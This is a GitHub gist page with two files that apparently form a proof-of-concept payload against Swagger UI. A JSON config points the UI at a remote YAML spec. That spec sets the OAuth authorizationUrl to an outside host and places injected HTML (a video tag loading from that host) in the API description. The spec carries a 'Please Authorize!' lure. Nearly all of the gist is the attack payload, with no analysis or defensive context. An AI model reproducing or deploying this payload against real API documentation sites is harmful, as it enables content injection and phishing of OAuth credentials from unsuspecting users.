Skip to content

Instantly share code, notes, and snippets.

@mohnqwerty
mohnqwerty / file2.json
Created October 16, 2023 08:13
swagger auth2
{
"url": "https://gist.githubusercontent.com/mohnqwerty/a57f6857303909dcc7aa20fabd82d29f/raw/c1572e1a64dbe72b99e144f9c9539401eb28bd77/file.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/mohnqwerty/a57f6857303909dcc7aa20fabd82d29f/raw/c1572e1a64dbe72b99e144f9c9539401eb28bd77/file.yaml",
"name": "Bar"
}
]
}
@mohnqwerty
mohnqwerty / file.yaml
Last active October 16, 2023 08:14
SWAGGER AUTH
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: http://authorization.site
info:
version: "0.0.1"
title: pacmanx POC arbitrary text
description: Please Authorize!<video src=//authorization.site>
paths: